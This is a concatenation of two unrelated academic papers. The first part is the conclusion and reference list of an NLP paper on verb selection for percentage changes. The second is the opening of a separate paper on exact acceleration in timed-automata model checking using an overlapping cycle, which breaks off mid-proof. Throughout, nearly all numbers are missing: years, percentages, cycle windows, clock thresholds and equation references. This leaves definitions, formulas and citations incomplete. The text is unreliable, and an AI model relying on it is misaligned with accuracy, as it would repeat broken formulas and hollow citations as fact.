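the sign test used for these comparisons reduces to a two-sided binomial test on the counts of ">" and "<" judgments, with the ties ("equally good") dropped. a minimal sketch using scipy follows; the counts in the example call are made up for illustration.

```python
from scipy.stats import binomtest   # scipy >= 1.7; older versions expose binom_test

def sign_test(n_better, n_worse):
    """two-sided sign test on paired preference judgments, ignoring ties."""
    n = n_better + n_worse
    return binomtest(n_better, n=n, p=0.5, alternative='two-sided').pvalue

print(sign_test(70, 40))   # counts invented for illustration
```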
retrospective manual inspection of the experimental results suggests that users seem to have relatively higher expectations of diversity for chinese adverbs than for english verbs. extensions robustness: it is still possible, though very un- likely, for the proposed probabilistic model to gen- erate atypical uses of a verb. a simple measure to avoid such situations is to reject the sampled verb w∗ if the posterior probability p(w∗|x) < τ where τ is a predefined threshold, e.g., %, and then resample w∗ until p(w∗|x) ≥ τ. unlimited range: if the magnitude of a percent- age change is allowed to go beyond %, we would no longer be able to use the beta distribution to fit the likelihood function p(x|w) as it is supported on a bounded interval. however, it should be straight- forward to use a flexible probability distribution sup- ported on the semi-infinite interval [ , +∞], such as the gamma distribution. subject: the context, in particular the subject of the percentage change, has not been taken into ac- count by the presented models. as illustrated by the two example sentences below, the same verb (“surge”) could be used for quite different percentage changes (“ %” vs “ %”) depending on the subject (“wheat price” vs “inflation”). • “according to world bank figures, wheat prices have surged up by percent in the past three years to february .” • “while inflation has surged to almost % in , it is projected by the commission to fall in .” furthermore, the significance of a percentage change often depends on the domain, and consequently, so does the most appropriate verb to describe a per- centage change. for example, a % increase in stock price is interesting, while a % increase in body temperature is life-threatening. it is, of course, possible to incorporate the subject information into our probabilistic model by extending eq. ( ) to p(w|x,s) = p(w,s)p(x|w,s)/p(x,s) where s is the subject word in the triple. on one hand, this should make the model more effective, for the rea- sons explained above. on the other hand, this would require a lot more data for reliable estimation of the model parameters, which is one of the reasons why we leave it for future work. language modeling: thanks to its probabilistic nature, our proposed model for verb selection could be seamlessly plugged into an n-gram statistical lan- guage model (jurafsky and martin, ), e.g., for the msr sentence completion challenge . this might be able to reduce the language model’s perplex- ity, as the probability of 〈subject, verb, percentage〉 triples could be calculated more precisely. hierarchical modeling: the choice of verb to de- scribe a particular percentage change could be af- fected by the style of the author, the topic of the document, and other contextual factors. to take those dimensions into account and build a finer prob- abilistic model for verb selection, we could embrace bayesian hierarchical modeling (gelman et al., ; kruschke, ) which, for example, could let each author’s model borrow the “statistical power” from other authors’. psychology: there exist a lot of studies in psy- chology on how people interpret probabilities and risks (reagan et al., ; berry et al., ). they could provide useful insights for further enhancing our verb selection method. conclusions the major research contribution of this paper is a probabilistic model that can select appropriate verbs https://goo.gl/yykbya to express percentage changes with different direc- tions and magnitudes. 
this model is not relying on hard-wired heuristics, but learned from training ex- amples (in the form of verb-percentage pairs) that are extracted from large-scale real-world news corpora. the choices of verbs made by the proposed model are found to match our intuitions about how differ- ent verbs are collocated with percentage changes of different sizes. the real challenge here is to strike the right balance between accuracy and diversity, which can be realized via smoothing. our experi- ments have confirmed that the proposed model can capture human authors’ pattern of usage around verbs better than the existing method currently employed by thomson reuters eikontm. we hope that this probabilistic model for verb selection could help data- to-text nlg systems achieve greater variation and naturalness. acknowledgments the research is partly funded by the national key r&d program of china (id: yfc ) and the nsfc grant (no. ). the titan x pascal gpu used for our experiments was kindly donated by the nvidia corporation. prof xuanjing huang (fudan) has helped with the datasets. we thank the anonymous reviewers and the ac- tion editor for their constructive and helpful com- ments. we also gratefully acknowledge the support of geek.ai for this work. references lada a adamic. . zipf, power-laws, and pareto — a ranking tutorial. technical report, hp labs. gabor angeli, percy liang, and dan klein. . a simple domain-independent probabilistic approach to generation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . anja belz and eric kow. . system building cost vs. output quality in data-to-text generation. in pro- ceedings of the th european workshop on natural language generation (enlg), pages – . anja belz. . automatic generation of weather fore- cast texts using comprehensive probabilistic generation- space models. natural language engineering (nle), ( ): – . dianne berry, theo raynor, peter knapp, and elisabetta bersellini. . over the counter medicines and the need for immediate action: a further evaluation of eu- ropean commission recommended wordings for com- municating risk. patient education and counseling, ( ): – . steven bird, ewan klein, and edward loper. . natu- ral language processing with python: analyzing text with the natural language toolkit. o’reilly media. sarah boyd. . trend: a system for generating intelligent descriptions of time series data. in pro- ceedings of the nd ieee international conference on intelligent processing systems (icips). eugene charniak, don blaheta, niyu ge, keith hall, john hale, and mark johnson. . bllip - wsj corpus release ldc t . web download. philadelphia: linguistic data consortium. andrew gelman, john carlin, hal stern, david dunson, aki vehtari, and donald rubin. . bayesian data analysis. crc, rd edition. eli goldberg, norbert driedger, and richard i. kittredge. . using natural-language processing to produce weather forecasts. ieee expert, ( ): – . ian goodfellow, yoshua bengio, and aaron courville. . deep learning. mit press. richard h.r. hahnloser, rahul sarpeshkar, misha a. ma- howald, rodney j. douglas, and h. sebastian seung. . digital selection and analogue amplification coexist in a cortex-inspired silicon circuit. nature, ( ): – . trevor hastie, robert tibshirani, and jerome friedman. . the elements of statistical learning: data min- ing, inference, and prediction. springer, nd edition. frederick jelinek and robert mercer, . 
interpolated estimation of markov source parameters from sparse data, pages – . north-holland publishing. daniel jurafsky and james h. martin. . speech and language processing: an introduction to natural language processing, computational linguistics and speech recognition. prentice hall, nd edition. dave s kerby. . the simple difference formula: an approach to teaching nonparametric correlation. com- prehensive psychology, ( ). diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . suneel kumar kingrani, mark levene, and dell zhang. . diversity analysis of web search results. in pro- ceedings of the annual international acm web science conference (websci). ioannis konstas and mirella lapata. . a global model for concept-to-text generation. journal of artifi- cial intelligence research (jair), : – . manfred krifka. . approximate interpretations of number words: a case for strategic communication. in cognitive foundations of interpretation, pages – . john k kruschke. . doing bayesian data analysis: a tutorial with r, jags, and stan. academic press, nd edition. anne e. magurran. . ecological diversity and its measurement. princeton university press. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press. christopher d. manning, mihai surdeanu, john bauer, jenny rose finkel, steven bethard, and david mc- closky. . the stanford corenlp natural language processing toolkit. in proceedings of the nd annual meeting of the association for computational linguis- tics (acl), system demonstrations, pages – . hongyuan mei, mohit bansal, and matthew r. walter. . what to talk about and how? selective gen- eration using lstms with coarse-to-fine alignment. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl- hlt), pages – . chris mellish and robert dale. . evaluation in the context of natural language generation. computer speech & language, ( ): – . priscilla moraes, kathleen mccoy, and sandra carberry. . adapting graph summaries to the users’ reading levels. in proceedings of the th international natural language generation conference (inlg), pages – . mark e. j. newman. . power laws, pareto distribu- tions and zipf’s law. contemporary physics, ( ): – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evalu- ation of machine translation. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . vassilis plachouras, charese smiley, hiroko bretz, ola taylor, jochen l. leidner, dezhao song, and frank schilder. . interacting with financial data us- ing natural language. in proceedings of the th in- ternational acm sigir conference on research and development in information retrieval (sigir), pages – . david mw powers. . applications and explanations of zipf’s law. in proceedings of the joint conferences on new methods in language processing and computa- tional natural language learning (nemlap/conll), pages – . dragomir r. radev, hong qi, harris wu, and weiguo fan. . evaluating web-based question answer- ing systems. in proceedings of the rd international conference on language resources and evaluation (lrec). alejandro ramos-soto, alberto bugarı́n, senén barro, and juan taboada. . automatic generation of textual short-term weather forecasts on real prediction data. 
in proceedings of the th international confer- ence on flexible query answering systems (fqas), pages – . josef raviv. . decision making in markov chains applied to the problem of pattern recognition. ieee transactions on information theory, ( ): – . robert t. reagan, frederick mosteller, and cleo youtz. . quantitative meanings of verbal probability ex- pressions. journal of applied psychology, ( ): . ehud reiter and anja belz. . an investigation into the validity of some metrics for automatically evalu- ating natural language generation systems. computa- tional linguistics, ( ): – . ehud reiter, somayajulu sripada, jim hunter, jin yu, and ian davy. . choosing words in computer- generated weather forecasts. artificial intelligence, ( - ): – . ehud reiter. . an architecture for data-to-text sys- tems. in proceedings of the th european workshop on natural language generation (enlg), pages – . stuart russell and peter norvig. . artificial intelli- gence: a modern approach. prentice hall, rd edition. david w scott. . multivariate density estimation: theory, practice, and visualization. john wiley & sons. claude e. shannon. . a mathematical theory of com- munication. bell system technical journal, : – . heung-yeung shum, xiaodong he, and di li. . from eliza to xiaoice: challenges and opportunities with social chatbots. arxiv preprint arxiv: . . edward h simpson. . measurement of diversity. nature. charese smiley, vassilis plachouras, frank schilder, hi- roko bretz, jochen l. leidner, and dezhao song. . when to plummet and when to soar: corpus based verb selection for natural language generation. in pro- ceedings of the th international natural language generation conference (inlg), pages – . somayajulu sripada, neil burnett, ross turner, john mastin, and dave evans. . a case study: nlg meeting weather industry demand for quality and quan- tity of textual weather forecasts. in proceedings of the th international natural language generation con- ference (inlg), pages – . ellen m. voorhees. . the trec- question an- swering track report. in proceedings of the th text retrieval conference (trec), pages – . dennis wackerly, william mendenhall, and richard scheaffer. . mathematical statistics with applica- tions. nelson education. frank wilcoxon. . individual comparisons by rank- ing methods. biometrics bulletin, ( ): – . alex wright. . algorithmic authors. communica- tions of the acm (cacm), ( ): – . chengxiang zhai and john lafferty. . a study of smoothing methods for language models applied to in- formation retrieval. acm transactions on information systems (tois), ( ): – . submitted october accepted april published may corresponding author lei zhuang, ielzhuang@zzu.edu.cn academic editor maurice ter beek additional information and declarations can be found on page doi . /peerj-cs. copyright wang et al. distributed under creative commons cc-by . open access exact acceleration of complex real-time model checking based on overlapping cycle guoqing wang , lei zhuang , yu song , mengyang he , ding ma and ling ma , school of information engineering, zhengzhou university, zhengzhou, henan, china college of information science and engineering, henan university of technology, zhengzhou, henan, china digital medical image technique research center, zhengzhou university, zhengzhou, henan, china abstract when real-time systems are modeled as timed automata, different time scales may lead to substantial fragmentation of the symbolic state space. 
exact acceleration solves the fragmentation problem without changing system reachability. the relatively mature technology of exact acceleration has been used with an appended cycle or a parking cycle, which can be applied to the calculation of a single acceleratable cycle model. using these two technologies to develop a complex real-time model requires additional states and consumes a large amount of time cost, thereby influencing acceleration efficiency. in this paper, a complex real-time exact acceleration method based on an overlapping cycle is proposed, which is an application scenario extension of the parking- cycle technique. by comprehensively analyzing the accelerating impacts of multiple acceleratable cycles, it is only necessary to add a single overlapping period with a fixed length without relying on the windows of acceleratable cycles. experimental results show that the proposed timed automaton model is simple and effectively decreases the time costs of exact acceleration. for the complex real-time system model, the method based on an overlapping cycle can accelerate the large scale and concurrent states which cannot be solved by the original exact acceleration theory. subjects real-time and embedded systems, theory and formal methods keywords real-time model checking, exact acceleration, complex real-time system, timed automata, overlapping cycle introduction in real-time embedded systems, especially complex real-time control systems, discrete logic control and continuous time behavior depend on and influence each other. take the internet of things (iot) gateway security system (wang et al., ) as an example: its control center generally has many different control modes to deal with diverse security risks, such as tampering, intrusion, and identity forging. important system parameters (e.g., sensor status, monitoring instructions, and terminal feedback information) change continuously over time. to meet specific time constraints or parameter values in the iot gateway security system, the management mode must be adjusted over time. the change rules of important parameters also differ by mode, and the response time to how to cite this article wang g, zhuang l, song y, he m, ma d, ma l. . exact acceleration of complex real-time model checking based on overlapping cycle. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ielzhuang@zzu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. various events should be modified accordingly. in this type of system (lee et al., ), logic control describes the logical control transformation of the system through models with high abstraction levels, such as finite state machine and petri net. time behavior can be simulated by clock variables and clock zone transformation. between the two layers, signals of the continuous layer and control modes of the discrete layer are correlated and transformed by certain interfaces and rules. typically, test and simulation technologies are the main means of guaranteeing software quality; however, they cover problems when using the operating system as the main measure, which cannot guarantee test completeness. these approaches are thus incapable of traversing all states in a real-time system, leading to covert problems in system operations (wang, pastore & briand, ). 
in the field of security-related systems with zero tolerance for system error, using formal theory and technology for security authentication results in clear descriptions and avoids the complexity of safety verification. formal description analysis and refinement have thus become a focus of recent research in related fields. in real-time model checking, timed automata can model the temporal behavior of real-time systems (pinisetty et al., ). clocks describe the state transitions, and clock constraints serve as the theoretical basis for real-time system model checking (han, yang & xing, ). this approach can easily realize automatic combination and transformation with other methods. the method is widely used in polling control systems, railway interlocking systems, and similar applications. due to clock variables, control programs and external environments often use different time measures, which can cause the number of states to increase exponentially when a timed automaton is transformed into a zone automaton. the reachability analysis algorithm generates many state fragments (iversen et al., ; chen & cui, ), resulting in a sharp increase in the state space and considerably prolonged detection time. the acceleration technique is a reduction method used to solve the fragmentation problem following from time measurement differences. dubout & fleuret ( ) applied an acceleration technique to linear target detection and effectively improved the detection performance. jeong et al. ( ) applied an implicit markov model as an improved framework to accelerate the inference model. for distributed and parallel computing, a workstation and a multicore processor were used to accelerate state-space searching (konur, fisher & schewe, ). lin, chen & xu ( ) studied an acceleration model using a bayesian classifier by analyzing the behavior of heterogeneous population trends; results indicated that acceleration in the reliability assessment improved the analytic accuracy. the model checking of linear temporal logic (ltl) model was studied by barnat et al. ( ), which employed computed unified device architecture for acceleration. two sat problem solvers were used to validate online models and accelerate the processing of complex behaviors (qanadilo, samara & zhao, ). the reachability problem is the first to consider in timed automata, which determines whether a path exists from its initial state to a target state. this problem can be solved by computing the zones that apply the abstraction technique in practice. state-of-the-art abstraction methods (behrmann et al., ; herbreteau, srivathsan & walukiewicz, ) produce an approximation closer to the actual reachable clock valuation, which includes wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. coarser abstractions. exact acceleration is an excellent means of abstraction to reduce required storage space and can alleviate state-space explosion. for practical issues such as protocol validation (zhang et al., ), iot system modeling (li et al., ), and smart contract security verification in blockchain (cruz, kaji & yanai, ; grishchenko, maffei & schneidewind, ), exact acceleration technology is an efficient way of minimizing required storage space and time. when iversen et al. ( ) used uppaal to verify the lego robotic system, a fragmentation problem was identified and briefly described, and some ideas for further research were suggested. 
an approximation technique was applied to a real-time system model for security and connectivity analysis, which avoided repetitive control (möller, ). after that, a real-time property language l∀s was proposed to check the rejection state of reachability and reduce safety and boundary liveness simultaneously (aceto et al., ). the problems and methods in these publications have promoted the concept of exact acceleration and inspired further research. related studies on exact acceleration in real-time model checking include hendriks & larsen ( ), yin, song & zhuang ( ), yin, zhuang & wang ( ), gou et al. ( ), boudjadar et al. ( ), and chadli et al. ( ). in the following four examples, the window of the acceleratable cycle is [a,b]. • hendriks & larsen ( ) introduced a method of syntax adjustment to a subset of timed automata by adding an appended cycle whose length was da/(b−a)e times longer than that of the acceleratable cycle. this method accelerates forward symbolic reachability analysis, which solves the fragmentation problem and optimizes the verification of the lego robotic system. • yin, song & zhuang ( ) proposed a method to identify the acceleratable cycle in timed automata by introducing topological sorting for a large state space of a timed automaton; by simplifying the scale of timed automata, the method operated efficiently. • an exact acceleration method based on a parking cycle was proposed (yin, zhuang & wang, ), in which the entry boundary condition was determined by the size of the acceleratable cycle’s window (the condition is z ≥a× ab−a +n ); the automaton model improved the speed of exact acceleration and reduced the cost. • by analyzing the main parameters of the acceleration process, gou et al. ( ) proposed a method for determining whether exact acceleration was required. this approach can be used to avoid adding an appended cycle to reduce verification speed when the number of fragments is small, or fragments do not satisfy certain conditions. • boudjadar et al. ( ) proposed a development method to improve the utilization rate of resources by using model-checking technology. in the design and development stage, exact acceleration technology was used to greatly improve the capability of symbolic model checking in a processing scheduling system. for the scheduling problem of network physical systems, chadli et al. ( ) modeled advanced specifications and validation frameworks with the help of exact acceleration technology, automatically transforming high-level specifications into formal models. the above two research works mainly applied exact acceleration to model a system resource scheduling problem but did not improve the original exact acceleration theory. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when modeling a complex real-time system (wang et al., ), multiple acceleratable cycles may overlap at the same location. if the appended cycle method is used for exact acceleration, then the added locations multiply as the number of acceleratable cycles increases, resulting in insufficient memory for model checking. if the parking cycle method is used for exact acceleration, acceleratable-cycle stacking leads to non-uniformity in parking-cycle entry conditions; differences in the windows of multiple acceleratable cycles can increase time consumption drastically. 
in this paper, we propose an exact acceleration method for complex real-time model checking based on an overlapping cycle, which is an application scenario extension of parking-cycle technique. a single overlapping cycle is developed by comprehensively analyzing the accelerating effects of multiple acceleratable cycles and analyzing acceleration differences among these cycles. the overlapping cycle is simple to create and has a fixed length, eliminating the need to add multiple locations for complex real-time models. the overlapping cycle adds much less state space than appended cycles or parking cycles in model checking, substantially reducing the acceleration cost. the proposed method can be effectively applied to modeling and verification of complex real-time systems such as the iot gateway security system. it can also alleviate additional consumption of time and space caused by state-space explosion while maintaining the original nature of the system. the remainder of this paper is organized as follows. the section ‘preliminaries’ briefly introduces timed automata, forward symbolic reachability analysis, and the theory of exact acceleration. the exact acceleration method for complex real-time models based on an overlapping cycle is proposed in ‘exact acceleration of complex real-time system model based on overlapping cycle’, which outlines the method of creating a single, fixed-length overlapping cycle. a timed automaton with an overlapping cycle is shown to accelerate the originally timed automaton with reachability. in ‘experimental results’, the acceleration effects of the appended cycle, parking cycle, and overlapping cycle with a complex real-time model example are compared using experiments. finally, the ‘conclusion’ provides a few ideas for future research. preliminaries timed automata this part is based on work by alur & dill ( ). to illustrate the real-time clock of timed automata more clearly, we define a clock constraint set t(c) contain all clock constraints. we assume that the set of clock variables is c, and the definition of the set of clock constraints τ is as follows: τ :=c ∼n|τ ∧τ where c ∈c, n∈n, and ∼ denotes one of the binary relationships {<,≤,=,≥,>}. the clock constraint set t(c) is the set of all clock constraints τ . a clock interpretation ν is a mapping from c to r+∪{ }, where r+ represents the set of positive real numbers. note that ν assigns each clock variable in the set of clock variables c. for a set x ⊆c, x := indicates that x assigns to each c ∈x (i.e., clock reset), whereas the clock variables in set c−x have no effects. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure timed automaton m. full-size doi: . /peerjcs. /fig- definition (timed automaton). a timed automaton is defined as a six-tuple (c,l,l ,a,i,e), where c is a set of clocks, l is a finite set of locations, l ⊆l is the set of initial locations, a is a set of action events, i represents mapping that provides every location l ∈l with some clock constraint in t(c), and e ⊆l×a×t(c)× c ×l is a set of edges. an edge (l,a,τ,λ,l ′ ) denotes a transition: when the clock constraint in location l satisfies τ , the system can complete action event a, move from location l to location l ′ , and allow clocks in λ to be reset. figure shows an example of a timed automaton. the timed automaton m represents a plain and abstract model of the control program and the external environment in a real-time system. 
if the control program sends instructions to the control center in an iot security system, the environment will be decided by sensors and actuators. the cycle of locations l , l , and l models the control program, labeled the control cycle, consisting of three atomic instructions whose clock is x. the external environment is modeled by clock y, which is checked each time in l ; clock y is also called the global clock. the size of the threshold constant large determines how slow the environment is relative to the control program. if y ≥ large, the control cycle may be exited. the semantics of a timed automaton m is defined by a transition system s(m) following alur & dill ( ). a state of s(m) is a pair (l,ν), where l is a location of m and ν indicates a clock interpretation for c such that ν satisfies i(l). regarding this transition system, the traces of a timed automaton have been defined by hendriks & larsen ( ). forward symbolic reachability analysis the forward symbolic reachability analysis algorithm is at the core of the real-time model-checking tool uppaal (behrmann, david & larsen, ). the model-checking engine uses an on-the-fly strategy to search forward from the initial location to determine whether a symbolic state is reachable. for each symbolic state that has not yet been explored, it calculates the successor states based on their clocks and actions and compares them to the symbolic states already searched. if they have been seen before, they are discarded; otherwise, they are added to the list of explored symbolic states. the reachability property ϕ of a timed automaton m can be presented as the timed computation tree logic (tctl) formula e <> (p), where p is a state property of m. table : results of symbolic states from a forward symbolic exploration by timed automaton m; each row gives a symbolic state, its location l, and its clock zone expressed as bounds on y, x, and y − x. we say that m satisfies ϕ, denoted by m � ϕ, if a trace exists in the form of ((l ,ν ),(l ,ν ),...) ∈ tr(m), where (li,νi) � p for some i ≥ . to describe the process of forward symbolic reachability analysis, we take automaton m in fig. as an example. table shows the symbolic states that timed automaton m searches forward from the initial location after one execution. in table , symbolic states and are both at location l ; however, their clock zones are not identical, so they represent two different symbolic states that must both be searched forward further. therefore, every execution of the control cycle results in new symbolic states. because the threshold large is usually large and the per-cycle increase of clock y is small, the timed automaton m must execute a certain number of control cycles to increase clock y effectively when verifying the reachability of l . the number of executions depends on large; the larger large is, the more executions are needed. due to the different clocks, when the model-checking tool explores the symbolic model cycle by cycle, many unnecessary clock fragments may appear in the state space, causing a forward symbolic fragment problem.
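as a rough illustration of this on-the-fly exploration and of the fragmentation it produces, the following sketch tracks only the interval of the global clock y at the reset location; the cycle window [2, 3], the threshold large = 50, the location names, and the plain interval zones are all simplifying assumptions and not uppaal's actual zone representation.

# a rough mimic of forward symbolic reachability for the control-cycle
# example: a symbolic state is (location, interval of the global clock y)
A, B = 2, 3          # assumed window of the control cycle
LARGE = 50           # assumed threshold checked at the reset location l0

def successors(state):
    loc, (lo, hi) = state
    if loc != "l0":
        return []                              # the goal location is a sink here
    succs = [("l0", (lo + A, hi + B))]         # one more pass around the cycle
    if hi >= LARGE:                            # exit guard y >= LARGE satisfiable
        succs.append(("goal", (max(lo, LARGE), hi)))
    return succs

def reachable(target):
    passed, waiting = [], [("l0", (0, 0))]
    while waiting:
        state = waiting.pop()                  # depth-first order
        if state[0] == target:
            return True, len(passed)
        # discard states subsumed by an already explored symbolic state
        if any(loc == state[0] and lo <= state[1][0] and state[1][1] <= hi
               for loc, (lo, hi) in passed):
            continue
        passed.append(state)
        waiting.extend(successors(state))
    return False, len(passed)

print(reachable("goal"))   # (True, 18): many l0-states are explored first

the number of explored reset-location states grows with large, which is exactly the fragmentation that exact acceleration is meant to remove.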
for example, if we only observe the symbolic states , , and of location l , we can find that each clock zone overlaps with the one in front of it, which is what we call a continuous clock zone. at this point, because the time measure inside the cycle is small, the overlapping clock zone is divided into a great many segments, which leads to the fragmentation problem. table lists results from the uppaal simulator. exact acceleration hendriks & larsen ( ) proposed the concept of exact acceleration, based on which we provide the basic definitions for our study. the acceleratable cycle is a key concept in exact acceleration. an acceleratable cycle can use only one clock in its clock constraints (including invariants, guards, and resets). definition (acceleratable cycle). let m = (c,l,l ,a,i,e) be a timed automaton, ec = (e ,...,en− ) ∈ en, and x ∈ c. an acceleratable cycle is defined as a two-tuple (ec,x) when the following conditions are satisfied: • ec is a cycle; • for all locations in ec, i(l) is either empty or of the form {x ≤ c}; • if (l,a,τ,λ,l′) ∈ ec, then τ is empty or of the form {x ≥ c}, and λ is empty or contains only x; and • x must be reset on all in-going edges to src(e ). clock x is the clock of the cycle, i(l) is the location invariant, and τ is the edge guard. the location src(e ) is the reset location whose out-going edge is e , which indicates the external clock’s checking position in the acceleratable cycle. if a specific location’s in-going edge in the cycle is ei, then the out-going edge of this location is ei+ , where i ∈ [ ,n− ]. the cycle in automaton m (fig. ), composed of locations l , l , and l , is an acceleratable cycle. the clock of the cycle is x, and the reset location is l . the invariants and guards are in accordance with the defined form over clock x, and the clock resets to zero at the only in-going edge of l . definition (window of acceleratable cycle). let an acceleratable cycle in the timed automaton m be (ec,x). the compression sequence of all traces is expressed as tr(ec) = ((l ,ν ), (l ,ν′ ), (l ,ν ), ..., (ln− ,νn− ), (ln− ,ν′n− ), (ln,νn)), where νi and ν′i indicate different clock interpretations, i ∈ [ ,n], and l = ln = src(e ). the pair ((lj,ν′j),(lj+ ,νj+ )) depends on the edge ej and can be understood as an action event of ej, j ∈ [ ,n− ]. the window of the acceleratable cycle (ec,x) is defined as the interval [a,b], a,b ∈ n, when the following conditions are satisfied: • the total delay of tr(ec) is an element of [a,b]; and • for any real number d ∈ [a,b], the delays in tr(ec) can be adjusted under legal clock constraints to make the total delay equal d. the total delay in this definition means the increase in the clock of the cycle; it can simply be seen as the increment of the external clock when the acceleratable cycle returns to the reset location once from the initial location. the window is the minimal and maximal time it may take to pass through the cycle. according to this definition, the window of the acceleratable cycle shown in fig. can be calculated as [ , ]. definition (accelerated automaton based on appended cycle). let m = (c,l,l ,a,i,e) be a timed automaton, and let cycle = (ec,x) be an acceleratable cycle of m, where l = {l ,l ,...,lm}, ec = (e ,e ,...,en− ), ei = (li,ai,τi,λi,li+ ).
acceleration of m based on the appended cycle is a new automaton acca(m,cycle) defined as (c,l′,l ,a,i′,e′), where • l′ = l ∪ {l′ , l′ , ..., l′n− } ∪ {l′ } ∪ {l′′ , l′′ , ..., l′′n− } • i′(li) = i(li), ≤ i ≤ m • i′(l′i) = i(li), ≤ i ≤ n− • i′(l′ ) = ∅ • i′(l′′i) = i(li), ≤ i ≤ n− • e′ = e ∪ {(l ,a ,τ ,λ ,l′ ), (l′n− ,an− ,τn− ,λn− ,l′ )} ∪ {(l′ ,a ,τ ,λ ,l′′ ), (l′′n− ,an− ,τn− ,λn− ,l )} ∪ {(l′i,ai,τi,λi,l′i+ ), (l′′i,ai,τi,λi,l′′i+ ) | ≤ i ≤ n− } • in particular, e′ = e ∪ {(l ,a ,τ ,λ ,l′ ), (l′ ,a ,τ ,λ ,l )} when n = . theorem . let m = (c,l,l ,a,i,e) be a timed automaton, and let cycle = (ec,x) be an acceleratable cycle of m with a window [a,b]. if ϕ is the reachability property of m, then a ≤ b ⇒ (m � ϕ ⇔ acca(m,cycle) � ϕ). theorem has been proved in hendriks & larsen ( ). in definition , the appended cycle is obtained by expanding the acceleratable cycle twice. if the appended cycle added to the timed automaton m is obtained by expanding the acceleratable cycle i times, then the precondition in theorem can be generalized to (i+ )a ≤ ib. definition (accelerated automaton based on parking cycle). let m = (c,l,l ,a,i,e) be a timed automaton, and let cycle = (ec,x) be an acceleratable cycle of m with a window of [a,b], where l = {l ,l ,...,lm}, ec = (e ,e ,...,en− ), ei = (li,ai,τi,λi,li+ ). the global clock is y, and the maximum value of y before entering the acceleratable cycle is n . the acceleration of m based on the parking cycle is a new automaton accp(m,cycle) defined as (c,l′,l ,a,i′,e′), where • l′ = l ∪ {l′ } • i′(li) = i(li), ≤ i ≤ m • i′(l′ ) = ∅ • e′ = e ∪ {(l ,a ,τ′,∅,l′ ), (l′ ,an− ,∅,λn− ,l )}, where τ′ is y ≥ a × ⌈a/(b−a)⌉ + n . definition has been given in yin, zhuang & wang ( ). the accelerated automaton acca(m,cycle) equals the timed automaton m with an appended cycle composed of the locations l , l′ , l′ , ..., l′n− , l′ , l′′ , l′′ , ..., l′′n− . the accelerated automaton accp(m,cycle) equals the timed automaton m with a parking cycle whose edge guard on y controls the acceleration timing: only when the acceleratable cycle has been executed at least ⌈a/(b−a)⌉ times is the automaton permitted to enter the parking cycle. figures and display the acceleration of m (fig. ) based on the appended cycle and the parking cycle, respectively; they are labeled the accelerated automata ma and mp. because the window of the acceleratable cycle is [ , ], the edge guard of the parking cycle in mp is y ≥ . theorem . let m = (c,l,l ,a,i,e) be a timed automaton, and let cycle = (ec,x) be an acceleratable cycle of m with a window of [a,b]. if ϕ is a reachability property of m, then a < b ⇒ (m � ϕ ⇔ accp(m,cycle) � ϕ). yin, zhuang & wang ( ) proves this theorem from the perspective of forward symbolic reachability analysis; it is a previous result of our group. we will give another proof of it from the viewpoint of zones later.
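whether a given cycle satisfies the syntactic conditions of the acceleratable-cycle definition above can be checked mechanically. a minimal sketch, assuming a small ad-hoc encoding of edges, guards, and invariants (not uppaal's input format) and a hypothetical three-location cycle over clock x with invented constants:

def is_acceleratable(cycle_edges, invariants, reset_in_edges, x):
    # definition of an acceleratable cycle: every invariant on the cycle has
    # the form x <= c, every guard the form x >= c, only x may be reset, and
    # x is reset on every in-going edge of the reset location src(e0)
    for e in cycle_edges:
        inv = invariants.get(e["src"])
        if inv is not None and inv[:2] != (x, "<="):
            return False                      # invariant must be x <= c
        g = e["guard"]
        if g is not None and g[:2] != (x, ">="):
            return False                      # guard must be x >= c
        if not set(e["resets"]) <= {x}:
            return False                      # only the cycle clock may reset
    return all(x in e["resets"] for e in reset_in_edges)

# hypothetical control cycle l0 -> l1 -> l2 -> l0 with cycle clock x
cycle = [
    {"src": "l0", "guard": None,           "resets": []},
    {"src": "l1", "guard": ("x", ">=", 1), "resets": []},
    {"src": "l2", "guard": None,           "resets": ["x"]},
]
invariants = {"l0": ("x", "<=", 1), "l1": ("x", "<=", 2), "l2": None}
print(is_acceleratable(cycle, invariants, reset_in_edges=[cycle[-1]], x="x"))  # True

in a real model checker the in-going edges of the reset location would of course be collected from the whole automaton, not only from the cycle itself.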
/fig- exact acceleration of complex real-time system model based on overlapping cycle the appended cycle and parking cycle technologies in exact acceleration apply to a real-time system model with a single acceleratable cycle. for a complex real-time system model (as wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. shown in fig. ), using these two technologies for exact acceleration requires additional states and consumes a large amount of time cost, which influences the acceleration effect. figure presents an example of the iot gateway security system (in wang et al., ). the timed automaton m ′ models a wireless sensor network including a reactive program and external environment. the run-time behavior control several sensors, which can be transformed into clock constrains in uppaal. every location in the cycle represents a sensor model in the iot system. the cycle’s clock is x, and clock y controls the execution time. the larger the constant large is, the more slowly the timed automaton m ′ runs. using the algorithm described by yin, song & zhuang ( ) to identify the acceleratable cycle in m ′, we obtain four acceleratable cycles whose reset locations are all l and share the clock of cycle x. for this complex real-time model, we propose a method based on the overlapping cycle for exact acceleration. theorem . let m =(c,l,l ,a,i,e) be a timed automaton, and let cycle =(ec,x) be an acceleratable cycle of m with a window of [a,b]. if a < b, there is a positive integer n in the forward symbolic reachability analysis, which leads the reset location to obtain a continuous clock zone after executing the cycle n times. proof. according to the forward symbolic reachability analysis, the problem of fragments in the acceleratable cycle will inevitably lead to the overlap of clock zones, that is, the appearance of continuous clock zone. if a < b, according to the definitions about exact acceleration, the continuous clock zone will be got after several executions of the acceleratable cycle, and the point of the proof 